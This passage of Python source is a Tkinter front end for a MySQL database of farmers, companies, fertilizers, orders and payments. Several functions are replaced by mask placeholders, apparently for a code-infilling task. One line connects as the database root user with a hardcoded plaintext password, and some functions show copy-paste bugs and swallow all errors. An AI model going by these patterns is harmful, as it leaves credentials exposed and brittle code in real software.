'tomato')\n label.place(x=0, y=0)\n cur.execute('CALL getMonth(%s);', [datetime.today().strftime('%m')])\n data = 
cur.fetchall()\n label = Label(root, text='The Transaction History of this month', font=\n ('Arial', 15))\n label.place(x=200, y=20)\n button = Button(root, text='BACK', command=entity_page)\n button.place(x=20, y=20)\n frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')\n frame.place(x=10, y=100, width=750, height=400)\n x_scroll = Scrollbar(frame, orient=HORIZONTAL)\n y_scroll = Scrollbar(frame, orient=VERTICAL)\n table = ttk.Treeview(frame, columns=('trans_id', 'p_f_id', 'p_date',\n 'p_amount', 'p_method'), xscrollcommand=x_scroll.set,\n yscrollcommand=y_scroll.set)\n x_scroll.pack(side=BOTTOM, fill=X)\n y_scroll.pack(side=RIGHT, fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('trans_id', text='Transaction Id')\n table.heading('p_f_id', text='Farmer Id')\n table.heading('p_date', text='Payment Date')\n table.heading('p_amount', text='Amount')\n table.heading('p_method', text='Payment Method')\n table['show'] = 'headings'\n table.pack()\n if len(data) != 0:\n for row in data:\n table.insert('', END, values=row)\n db.close()\n db = mysql.connector.connect(host='localhost', user='root', passwd=\n 'bhushi', database='farmer_app')\n cur = db.cursor()\n\n\ndef farmer():\n global root\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Farmer Table', font=('Times new roman', 15),\n bg='white')\n label.place(x=350, y=10)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=\n entity_page)\n Button.place(x=10, y=50)\n Button = tk.Button(root, text='Insert', font=('Arial', 15), command=\n insert_farmer)\n Button.place(x=110, y=50)\n Button = tk.Button(root, text='Delete', font=('Arial', 15), command=\n delete_farmer)\n Button.place(x=210, y=50)\n Button = tk.Button(root, text='Update', font=('Arial', 15), command=\n update_farmer)\n Button.place(x=310, y=50)\n Button = tk.Button(root, text='Search', font=('Arial', 15), 
command=\n search_farmer)\n Button.place(x=410, y=50)\n view_farmer()\n\n\ndef view_farmer():\n frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')\n frame.place(x=10, y=100, width=750, height=400)\n x_scroll = Scrollbar(frame, orient=HORIZONTAL)\n y_scroll = Scrollbar(frame, orient=VERTICAL)\n table = ttk.Treeview(frame, columns=('f_id', 'f_name', 'f_phone',\n 'f_mail', 'f_locality', 'f_address'), xscrollcommand=x_scroll.set,\n yscrollcommand=y_scroll.set)\n x_scroll.pack(side=BOTTOM, fill=X)\n y_scroll.pack(side=RIGHT, fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('f_id', text='Farmer Id')\n table.heading('f_name', text='Farmer Name')\n table.heading('f_phone', text='Farmer Phone')\n table.heading('f_mail', text='Farmer Mail')\n table.heading('f_locality', text='Farmer Locality')\n table.heading('f_address', text='Farmer Address')\n table['show'] = 'headings'\n table.column('f_id', width=100)\n table.pack()\n cur.execute('SELECT * FROM farmer;')\n data = cur.fetchall()\n db.commit()\n if len(data) != 0:\n for row in data:\n table.insert('', END, values=row)\n\n\n<mask token>\n\n\ndef insert_farmer():\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Farmer_id', font=('Times new roman', 20), bg=\n 'white')\n label.place(x=50, y=10)\n label = Label(root, text='Farmer_name', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=60)\n label = Label(root, text='Farmer_phone', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Farmer_mail', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=160)\n label = Label(root, text='Farmer_locality', font=('Times new roman', 20\n ), bg='white')\n label.place(x=50, y=210)\n label = Label(root, text='Farmer_address', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, 
y=270)\n e1 = Entry(root, width=50)\n e2 = Entry(root, width=50)\n e3 = Entry(root, width=50)\n e4 = Entry(root, width=50)\n e5 = Entry(root, width=50)\n e6 = Entry(root, width=50)\n e1.place(x=350, y=10)\n e2.place(x=350, y=60)\n e3.place(x=350, y=110)\n e4.place(x=350, y=160)\n e5.place(x=350, y=210)\n e6.place(x=350, y=270)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=farmer)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n insert_farmer_command)\n Button.place(x=400, y=400)\n\n\n<mask token>\n\n\ndef invalid(page):\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n if page == 'farmer':\n label = Label(root, text='Enter valid farmer_id', font=(\n 'Times new roman', 30), bg='white')\n label.place(x=170, y=200)\n button = Button(root, text='Re-enter', font=('Times new roman', 20),\n command=insert_farmer)\n button.place(x=300, y=400)\n elif page == 'company':\n label = Label(root, text='Enter valid company_id', font=(\n 'Times new roman', 30), bg='white')\n label.place(x=170, y=200)\n button = Button(root, text='Re-enter', font=('Times new roman', 20),\n command=insert_company)\n button.place(x=300, y=400)\n\n\n<mask token>\n\n\ndef delete_farmer_command():\n try:\n sql = 'DELETE FROM farmer WHERE f_id=%s;'\n cur.execute(sql, [e1.get()])\n db.commit()\n farmer()\n except:\n l = Label(root, text='Invalid Entry', font=('times new roman', 15))\n l.place(x=100, y=300)\n\n\ndef update_farmer():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Farmer Id:', font=('Times new roman', 20), bg\n ='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='OK', font=('Arial', 15), command=update)\n Button.place(x=300, y=400)\n\n\ndef update():\n try:\n global e1, e2, e3, e4, e5, 
e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500),\n bg='tomato')\n label.place(x=0, y=0)\n sql = 'SELECT * FROM farmer WHERE f_id=%s;'\n vals = [e1.get()]\n cur.execute(sql, vals)\n label = Label(root, text='Farmer_id', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=10)\n label = Label(root, text='Farmer_name', font=('Times new roman', 20\n ), bg='white')\n label.place(x=50, y=60)\n label = Label(root, text='Farmer_phone', font=('Times new roman', \n 20), bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Farmer_mail', font=('Times new roman', 20\n ), bg='white')\n label.place(x=50, y=160)\n label = Label(root, text='Farmer_locality', font=('Times new roman',\n 20), bg='white')\n label.place(x=50, y=210)\n label = Label(root, text='Farmer_address', font=('Times new roman',\n 20), bg='white')\n label.place(x=50, y=270)\n e1 = Entry(root)\n e2 = Entry(root)\n e3 = Entry(root)\n e4 = Entry(root)\n e5 = Entry(root)\n e6 = Entry(root)\n data = cur.fetchall()\n arr = [e1, e2, e3, e4, e5, e6]\n count = 0\n for val in data[0]:\n arr[count].insert(0, val)\n count += 1\n e1.place(x=350, y=10)\n e2.place(x=350, y=60)\n e3.place(x=350, y=110)\n e4.place(x=350, y=160)\n e5.place(x=350, y=210)\n e6.place(x=350, y=270)\n label = Button(root, text='Modify', font=('Times new roman', 20),\n bg='blue', command=update_command)\n label.place(x=300, y=400)\n except:\n l = Label(root, text='Invalid Farmer_id', font=('times new roman', 15))\n l.place(x=100, y=300)\n update_farmer()\n\n\ndef update_command():\n try:\n sql = (\n 'UPDATE farmer SET f_name=%s,f_phone_no=%s,f_mail=%s,f_locality=%s,f_address=%s WHERE f_id=%s;'\n )\n vals = e2.get(), e3.get(), e4.get(), e5.get(), e6.get(), e1.get()\n cur.executemany(sql, [vals])\n db.commit()\n farmer()\n except:\n update_farmer()\n\n\ndef search_farmer():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = 
Label(root, text='Farmer Id:', font=('Times new roman', 20), bg\n ='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=farmer)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=search)\n Button.place(x=400, y=400)\n\n\ndef search():\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n try:\n sql = 'SELECT * FROM farmer WHERE f_id=%s;'\n val = [e1.get()]\n cur.execute(sql, val)\n Button = tk.Button(root, text='OK', font=('Arial', 15), command=farmer)\n Button.place(x=300, y=400)\n for val in cur:\n count = 0\n Y = 50\n names = ['farmer id: ', 'farmer name: ', 'farmer phone: ',\n 'farmer mail: ', 'farmer locality: ', 'farmer address: ']\n for i in val:\n label = Label(root, text=names[count] + str(i), font=(\n 'Times new roman', 20), bg='tomato')\n label.place(x=10, y=Y)\n Y += 50\n count += 1\n db.commit()\n except:\n l = Label(root, text='Invalid Farmer Id', font=('times new roman', 15))\n l.place(x=100, y=300)\n search_farmer()\n\n\ndef company():\n global root\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Company Table', font=('Times new roman', 15),\n bg='white')\n label.place(x=350, y=10)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=\n entity_page)\n Button.place(x=10, y=50)\n Button = tk.Button(root, text='Insert', font=('Arial', 15), command=\n insert_company)\n Button.place(x=110, y=50)\n Button = tk.Button(root, text='Delete', font=('Arial', 15), command=\n delete_company)\n Button.place(x=210, y=50)\n Button = tk.Button(root, text='Update', font=('Arial', 15), command=\n update_company)\n Button.place(x=310, y=50)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_company)\n Button.place(x=410, y=50)\n 
view_company()\n\n\ndef view_company():\n frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')\n frame.place(x=10, y=100, width=750, height=400)\n x_scroll = Scrollbar(frame, orient=HORIZONTAL)\n y_scroll = Scrollbar(frame, orient=VERTICAL)\n table = ttk.Treeview(frame, columns=('c_id', 'c_name', 'c_address'),\n xscrollcommand=x_scroll.set, yscrollcommand=y_scroll.set)\n x_scroll.pack(side=BOTTOM, fill=X)\n y_scroll.pack(side=RIGHT, fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('c_id', text='Company Id')\n table.heading('c_name', text='Company Name')\n table.heading('c_address', text='Company Address')\n table['show'] = 'headings'\n table.column('c_id', width=100)\n table.pack()\n cur.execute('SELECT * FROM company;')\n data = cur.fetchall()\n db.commit()\n if len(data) != 0:\n for row in data:\n table.insert('', END, values=row)\n\n\ndef insert_company():\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Company_id', font=('Times new roman', 20), bg\n ='white')\n label.place(x=50, y=10)\n label = Label(root, text='Company_name', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Company_address', font=('Times new roman', 20\n ), bg='white')\n label.place(x=50, y=210)\n e1 = Entry(root, width=50)\n e2 = Entry(root, width=50)\n e3 = Entry(root, width=50)\n e1.place(x=350, y=10)\n e2.place(x=350, y=110)\n e3.place(x=350, y=210)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=company)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n insert_company_command)\n Button.place(x=400, y=400)\n\n\ndef insert_company_command():\n try:\n if len(e1.get()) > 3:\n invalid('company')\n else:\n sql = 'INSERT INTO company values(%s,%s,%s);'\n vals = e1.get(), e2.get(), e3.get()\n 
cur.executemany(sql, [vals])\n db.commit()\n company()\n except:\n insert_company()\n\n\ndef delete_company():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Company Id:', font=('Times new roman', 20),\n bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=company)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n delete_company_command)\n Button.place(x=400, y=400)\n\n\ndef delete_company_command():\n try:\n sql = 'DELETE FROM company WHERE c_id=%s;'\n cur.execute(sql, [int(e1.get())])\n db.commit()\n company()\n except:\n l = Label(root, text='Invalid Entry', font=('times new roman', 15))\n l.place(x=100, y=300)\n\n\n<mask token>\n\n\ndef update_c():\n try:\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500),\n bg='tomato')\n label.place(x=0, y=0)\n sql = 'SELECT * FROM company WHERE c_id=%s;'\n vals = [e1.get()]\n cur.execute(sql, vals)\n label = Label(root, text='Company_id', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=10)\n label = Label(root, text='Company_name', font=('Times new roman', \n 20), bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Company_address', font=('Times new roman',\n 20), bg='white')\n label.place(x=50, y=210)\n e1 = Entry(root)\n e2 = Entry(root)\n e3 = Entry(root)\n data = cur.fetchall()\n arr = [e1, e2, e3]\n count = 0\n for val in data[0]:\n arr[count].insert(0, val)\n count += 1\n e1.place(x=350, y=10)\n e2.place(x=350, y=110)\n e3.place(x=350, y=210)\n label = Button(root, text='Modify', font=('Times new roman', 20),\n bg='blue', command=update_command_c)\n label.place(x=300, y=400)\n except:\n l = Label(root, text='Invalid Farmer_id', font=('times new roman', 15))\n l.place(x=100, 
y=300)\n update_company()\n\n\n<mask token>\n\n\ndef search_company():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Company Id:', font=('Times new roman', 20),\n bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=company)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_c)\n Button.place(x=400, y=400)\n\n\ndef search_c():\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n try:\n sql = 'SELECT * FROM company WHERE c_id=%s;'\n val = [e1.get()]\n cur.execute(sql, val)\n Button = tk.Button(root, text='OK', font=('Arial', 15), command=company\n )\n Button.place(x=300, y=400)\n for val in cur:\n count = 0\n Y = 50\n names = ['company id: ', 'company name: ', 'company address: ']\n for i in val:\n label = Label(root, text=names[count] + str(i), font=(\n 'Times new roman', 20), bg='tomato')\n label.place(x=10, y=Y)\n Y += 50\n count += 1\n db.commit()\n except:\n l = Label(root, text='Invalid Company Id', font=('times new roman', 15)\n )\n l.place(x=100, y=300)\n search_company()\n\n\ndef fertilizer():\n global root\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Fertilizer Table', font=('Times new roman', \n 15), bg='white')\n label.place(x=350, y=10)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=\n entity_page)\n Button.place(x=10, y=50)\n Button = tk.Button(root, text='Insert', font=('Arial', 15), command=\n insert_fer)\n Button.place(x=110, y=50)\n Button = tk.Button(root, text='Delete', font=('Arial', 15), command=\n delete_fer)\n Button.place(x=210, y=50)\n Button = tk.Button(root, text='Update', font=('Arial', 15), command=\n 
update_fer)\n Button.place(x=310, y=50)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_fer)\n Button.place(x=410, y=50)\n view_fer()\n\n\ndef view_fer():\n frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')\n frame.place(x=10, y=100, width=750, height=400)\n x_scroll = Scrollbar(frame, orient=HORIZONTAL)\n y_scroll = Scrollbar(frame, orient=VERTICAL)\n table = ttk.Treeview(frame, columns=('fe_formula', 'fe_name',\n 'fe_content', 'fe_price', 'company_id'), xscrollcommand=x_scroll.\n set, yscrollcommand=y_scroll.set)\n x_scroll.pack(side=BOTTOM, fill=X)\n y_scroll.pack(side=RIGHT, fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('fe_formula', text='Fertilizer Formula')\n table.heading('fe_name', text='Fertilizer name')\n table.heading('fe_content', text='Fertilizer content')\n table.heading('fe_price', text='Fertilizer price')\n table.heading('company_id', text='Company_id')\n table['show'] = 'headings'\n table.pack()\n cur.execute('SELECT * FROM fertilizer;')\n data = cur.fetchall()\n db.commit()\n if len(data) != 0:\n for row in data:\n table.insert('', END, values=row)\n\n\n<mask token>\n\n\ndef insert_fer_command():\n try:\n sql = 'INSERT INTO fertilizer values(%s,%s,%s,%s,%s);'\n vals = e1.get(), e2.get(), e3.get(), e4.get(), e5.get()\n cur.executemany(sql, [vals])\n db.commit()\n fertilizer()\n except:\n insert_fer()\n\n\ndef delete_fer():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Fertilizer formula:', font=('Times new roman',\n 20), bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=\n fertilizer)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n delete_fer_command)\n Button.place(x=400, y=400)\n\n\ndef 
delete_fer_command():\n try:\n sql = 'DELETE FROM fertilizer WHERE fe_formula=%s;'\n cur.execute(sql, [e1.get()])\n db.commit()\n fertilizer()\n except:\n l = Label(root, text='Invalid Entry', font=('times new roman', 15))\n l.place(x=100, y=300)\n\n\ndef update_fer():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Fertlizer formula:', font=('Times new roman',\n 20), bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='OK', font=('Arial', 15), command=update_fe)\n Button.place(x=300, y=400)\n\n\ndef update_fe():\n try:\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500),\n bg='tomato')\n label.place(x=0, y=0)\n sql = 'SELECT * FROM fertilizer WHERE fe_formula=%s;'\n vals = [e1.get()]\n cur.execute(sql, vals)\n label = Label(root, text='Fertlizer formula', font=(\n 'Times new roman', 20), bg='white')\n label.place(x=50, y=10)\n label = Label(root, text='Fertlizer name', font=('Times new roman',\n 20), bg='white')\n label.place(x=50, y=60)\n label = Label(root, text='Fertlizer content', font=(\n 'Times new roman', 20), bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Fertlizer price', font=('Times new roman',\n 20), bg='white')\n label.place(x=50, y=160)\n label = Label(root, text='comapny_id', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=210)\n e1 = Entry(root)\n e2 = Entry(root)\n e3 = Entry(root)\n e4 = Entry(root)\n e5 = Entry(root)\n data = cur.fetchall()\n arr = [e1, e2, e3, e4, e5, e6]\n count = 0\n for val in data[0]:\n arr[count].insert(0, val)\n count += 1\n e1.place(x=350, y=10)\n e2.place(x=350, y=60)\n e3.place(x=350, y=110)\n e4.place(x=350, y=160)\n e5.place(x=350, y=210)\n label = Button(root, text='Modify', font=('Times new roman', 20),\n bg='blue', command=update_command_fe)\n 
label.place(x=300, y=400)\n except:\n l = Label(root, text='Invalid Farmer_id', font=('times new roman', 15))\n l.place(x=100, y=300)\n update_fer()\n\n\n<mask token>\n\n\ndef search_fer():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Fertlizer formula:', font=('Times new roman',\n 20), bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=\n fertilizer)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_fe)\n Button.place(x=400, y=400)\n\n\ndef search_fe():\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n try:\n sql = 'SELECT * FROM fertilizer WHERE fe_formula=%s;'\n val = [e1.get()]\n cur.execute(sql, val)\n Button = tk.Button(root, text='OK', font=('Arial', 15), command=\n fertilizer)\n Button.place(x=300, y=400)\n for val in cur:\n count = 0\n Y = 50\n names = ['fertilizer formula: ', 'fertilizer name: ',\n 'fertilizer content: ', 'fertilizer price: ', 'company_id: ']\n for i in val:\n label = Label(root, text=names[count] + str(i), font=(\n 'Times new roman', 20), bg='tomato')\n label.place(x=10, y=Y)\n Y += 50\n count += 1\n db.commit()\n except:\n l = Label(root, text='Invalid Fertilizer formula', font=(\n 'times new roman', 15))\n l.place(x=100, y=300)\n search_fer()\n\n\ndef orders():\n global root\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Orders Table', font=('Times new roman', 15),\n bg='white')\n label.place(x=350, y=10)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=\n entity_page)\n Button.place(x=10, y=50)\n Button = tk.Button(root, text='Insert', font=('Arial', 15), command=\n insert_ord)\n 
Button.place(x=110, y=50)\n Button = tk.Button(root, text='Delete', font=('Arial', 15), command=\n delete_ord)\n Button.place(x=210, y=50)\n Button = tk.Button(root, text='Update', font=('Arial', 15), command=\n update_ord)\n Button.place(x=310, y=50)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_ord)\n Button.place(x=410, y=50)\n view_ord()\n\n\ndef view_ord():\n frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')\n frame.place(x=10, y=100, width=750, height=400)\n x_scroll = Scrollbar(frame, orient=HORIZONTAL)\n y_scroll = Scrollbar(frame, orient=VERTICAL)\n table = ttk.Treeview(frame, columns=('or_id', 'or_date', 'or_fid',\n 'or_formula', 'or_to'), xscrollcommand=x_scroll.set, yscrollcommand\n =y_scroll.set)\n x_scroll.pack(side=BOTTOM, fill=X)\n y_scroll.pack(side=RIGHT, fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('or_id', text='Order Id')\n table.heading('or_date', text='Order Date')\n table.heading('or_fid', text='Ordered Farmer Id')\n table.heading('or_formula', text='Order (item)formula')\n table.heading('or_to', text='Order to')\n table['show'] = 'headings'\n table.pack()\n cur.execute('SELECT * FROM orders;')\n data = cur.fetchall()\n db.commit()\n if len(data) != 0:\n for row in data:\n table.insert('', END, values=row)\n\n\n<mask token>\n\n\ndef insert_ord():\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Order Id', font=('Times new roman', 20), bg=\n 'white')\n label.place(x=50, y=10)\n label = Label(root, text='Order date', font=('Times new roman', 20), bg\n ='white')\n label.place(x=50, y=60)\n label = Label(root, text='Order FID', font=('Times new roman', 20), bg=\n 'white')\n label.place(x=50, y=110)\n label = Label(root, text='Order formula', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=160)\n label = Label(root, 
text='Order to', font=('Times new roman', 20), bg=\n 'white')\n label.place(x=50, y=210)\n e1 = Entry(root, width=50)\n e2 = Entry(root, width=50)\n e3 = Entry(root, width=50)\n e4 = Entry(root, width=50)\n e5 = Entry(root, width=50)\n e1.place(x=350, y=10)\n e2.place(x=350, y=60)\n e2.insert(0, datetime.now())\n e3.place(x=350, y=110)\n e4.place(x=350, y=160)\n e5.place(x=350, y=210)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=orders)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n insert_ord_command)\n Button.place(x=400, y=400)\n\n\ndef insert_ord_command():\n try:\n sql = 'INSERT INTO orders values(%s,%s,%s,%s,%s);'\n vals = e1.get(), e2.get(), e3.get(), e4.get(), e5.get()\n cur.executemany(sql, [vals])\n db.commit()\n orders()\n except:\n insert_ord()\n\n\ndef delete_ord():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Order Id:', font=('Times new roman', 20), bg=\n 'tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=orders)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n delete_ord_command)\n Button.place(x=400, y=400)\n\n\ndef delete_ord_command():\n try:\n sql = 'DELETE FROM orders WHERE or_id=%s;'\n cur.execute(sql, [e1.get()])\n db.commit()\n orders()\n except:\n l = Label(root, text='Invalid Entry', font=('times new roman', 15))\n l.place(x=100, y=300)\n\n\ndef update_ord():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Order Id:', font=('Times new roman', 20), bg=\n 'tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='OK', font=('Arial', 15), 
command=update_or)\n Button.place(x=300, y=400)\n\n\ndef update_or():\n try:\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500),\n bg='tomato')\n label.place(x=0, y=0)\n sql = 'SELECT * FROM orders WHERE or_id=%s;'\n vals = [e1.get()]\n cur.execute(sql, vals)\n label = Label(root, text='Order Id', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=10)\n label = Label(root, text='Order Date', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=60)\n label = Label(root, text='Order f_id', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Order formula', font=('Times new roman', \n 20), bg='white')\n label.place(x=50, y=160)\n label = Label(root, text='Order to', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=210)\n e1 = Entry(root)\n e2 = Entry(root)\n e3 = Entry(root)\n e4 = Entry(root)\n e5 = Entry(root)\n data = cur.fetchall()\n arr = [e1, e2, e3, e4, e5, e6]\n count = 0\n for val in data[0]:\n arr[count].insert(0, val)\n count += 1\n e1.place(x=350, y=10)\n e2.place(x=350, y=60)\n e3.place(x=350, y=110)\n e4.place(x=350, y=160)\n e5.place(x=350, y=210)\n label = Button(root, text='Modify', font=('Times new roman', 20),\n bg='blue', command=update_command_ord)\n label.place(x=300, y=400)\n except:\n l = Label(root, text='Invalid Order_id', font=('times new roman', 15))\n l.place(x=100, y=300)\n update_ord()\n\n\ndef update_command_ord():\n sql = (\n 'UPDATE orders SET or_date=%s,or_fid=%s,or_formula=%s,or_to=%s WHERE or_id=%s;'\n )\n vals = e2.get(), e3.get(), e4.get(), e5.get(), e1.get()\n cur.executemany(sql, [vals])\n db.commit()\n orders()\n\n\ndef search_ord():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Order Id:', font=('Times new roman', 20), bg=\n 'tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, 
width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=orders)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_or)\n Button.place(x=400, y=400)\n\n\ndef search_or():\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n try:\n sql = 'SELECT * FROM orders WHERE or_id=%s;'\n val = [e1.get()]\n cur.execute(sql, val)\n Button = tk.Button(root, text='OK', font=('Arial', 15), command=orders)\n Button.place(x=300, y=400)\n for val in cur:\n count = 0\n Y = 50\n names = ['order Id: ', 'Order date: ', 'Order fid: ',\n 'Order formula: ', 'order to: ']\n for i in val:\n label = Label(root, text=names[count] + str(i), font=(\n 'Times new roman', 20), bg='tomato')\n label.place(x=10, y=Y)\n Y += 50\n count += 1\n db.commit()\n except:\n l = Label(root, text='Invalid order id', font=('times new roman', 15))\n l.place(x=100, y=300)\n search_ord()\n\n\ndef payment():\n global root\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Payment Table', font=('Times new roman', 15),\n bg='white')\n label.place(x=350, y=10)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=\n entity_page)\n Button.place(x=10, y=50)\n Button = tk.Button(root, text='Insert', font=('Arial', 15), command=\n insert_pay)\n Button.place(x=110, y=50)\n Button = tk.Button(root, text='Delete', font=('Arial', 15), command=\n delete_pay)\n Button.place(x=210, y=50)\n Button = tk.Button(root, text='Update', font=('Arial', 15), command=\n update_pay)\n Button.place(x=310, y=50)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_pay)\n Button.place(x=410, y=50)\n view_pay()\n\n\ndef view_pay():\n frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')\n frame.place(x=10, y=100, width=750, height=400)\n x_scroll = Scrollbar(frame, 
